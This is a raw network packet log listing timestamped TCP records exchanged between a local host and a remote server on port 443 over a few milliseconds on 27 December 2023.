Dec 27, 2023 17:57:21.598185062 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.598396063 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.598418951 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.598444939 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.598454952 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.598476887 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.598501921 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.598527908 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.598552942 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.598553896 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.598567963 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.598584890 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.598612070 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.599024057 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.599040985 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.599078894 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.599096060 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.599107027 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.599131107 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.599340916 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.599360943 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.599390030 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.599395990 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.599420071 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.599569082 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.599600077 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.599627972 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.599632978 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.599641085 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.599667072 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.599685907 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.600038052 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.600059032 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.600097895 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.600100994 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.600111961 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.600116968 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.600135088 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.600279093 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.600302935 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.600333929 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.600342035 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.600368977 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.600594997 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.600625038 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.600651979 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.600655079 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.600661039 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.600683928 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.600713015 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.601007938 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.601027966 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.601063967 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.601070881 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.601078987 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.601087093 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.601110935 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.601291895 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.601313114 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.601350069 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.601356983 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.601385117 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.601651907 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.601666927 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.601711035 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.601716042 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.601728916 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.601964951 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.602004051 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.602029085 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.602037907 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.602058887 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.602093935 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.602219105 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.602235079 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.602273941 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.602274895 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.602286100 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.602302074 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.602322102 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.602580070 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.602632046 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.602670908 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.602706909 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.602714062 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.602734089 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.602760077 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.602761030 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.602772951 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.602794886 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.602822065 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.602828026 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.602855921 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.602873087 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.602876902 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.603082895 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.603105068 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.603143930 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.603151083 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.603178978 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.603236914 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.603259087 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.603293896 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.603301048 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.603312969 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.603571892 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.603607893 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.603636980 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.603638887 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.603646994 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.603671074 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.603691101 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.603697062 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.603707075 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.603724957 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.603746891 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.603753090 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.603771925 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.603802919 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.603806973 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.604043007 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.604058981 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.604098082 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.604104996 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.604121923 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.604434967 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.604458094 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.604491949 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.604499102 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.604511023 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.604630947 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.604666948 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.604696035 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.604724884 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.604727983 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.604736090 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.604784012 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.604882956 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.604890108 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.604923964 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.604928970 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.604933977 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.604988098 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.605063915 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.605082035 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.605122089 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.605123043 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.605132103 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.605144978 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.605170965 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.605391979 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.605398893 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.605423927 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.605429888 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.605458975 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.605463982 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.605484962 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.605602026 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.605628014 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.605660915 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.605668068 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.605694056 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.605712891 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.605746031 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.605768919 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.605771065 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.605779886 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.605803013 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.605822086 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.605998039 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.606014967 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.606059074 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.606071949 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.606082916 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.606111050 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.606123924 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.606131077 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.606147051 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.606177092 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.606184006 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.606218100 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.606350899 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.606364965 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.606395006 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.606400967 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.606424093 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.606583118 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.606612921 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.606642962 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.606650114 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.606669903 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.606690884 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.606723070 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.606765985 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.606765985 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.606772900 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.606942892 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.606962919 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.606992960 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.607002020 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.607029915 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.607292891 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.607307911 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.607345104 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.607350111 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.607369900 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.607603073 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.607611895 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.607654095 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.607661009 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.607682943 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.607948065 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.607963085 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.608010054 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.608016014 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.608038902 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.608087063 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.608107090 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.608136892 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.608144045 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.608171940 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.608352900 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.608366966 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.608406067 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.608411074 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.608432055 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.608458996 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.608479023 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.608511925 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.608517885 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.608546972 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.608705044 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.608725071 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.608787060 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.608787060 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.608793974 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.609011889 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.609033108 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.609061003 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.609066010 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.609121084 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.609286070 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.609299898 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.609340906 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.609347105 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.609354973 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.609441996 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.609467983 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.609525919 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.609525919 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.609534025 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.609595060 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.609607935 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.609656096 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.609667063 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.609679937 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.610012054 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.610032082 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.610064983 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.610074997 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.610085964 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.610219002 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.610233068 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.610270023 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.610279083 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.610301018 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.610564947 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.610586882 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.610615969 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.610621929 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.610646963 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.610662937 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.610682964 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.610713959 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.610719919 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.610733032 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.610781908 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.610801935 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.610832930 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.610838890 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.610861063 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.610868931 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.610882998 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.610923052 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.610929966 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.610946894 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.611160994 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.611187935 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.611213923 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.611222982 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.611241102 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.611258984 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.611274004 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.611315012 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.611325026 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.611346960 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.611368895 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.611387968 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.611413956 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.611424923 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.611445904 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.611686945 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.611701012 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.611741066 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.611747026 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.611778975 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.611916065 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.611939907 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.611967087 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.611973047 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.612000942 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.612184048 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.612200975 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.612242937 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.612250090 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.612267971 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.612335920 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.612364054 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.612386942 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.612394094 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.612416983 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.612504959 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.612518072 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.612560987 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.612569094 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.612592936 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.612787962 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.612840891 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.612884998 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.612890005 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.612917900 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.612955093 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.612972021 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.613006115 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.613012075 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.613034964 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.613115072 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.613135099 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.613166094 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.613171101 CET	443	49737	52.217.163.105	192.168.2.4
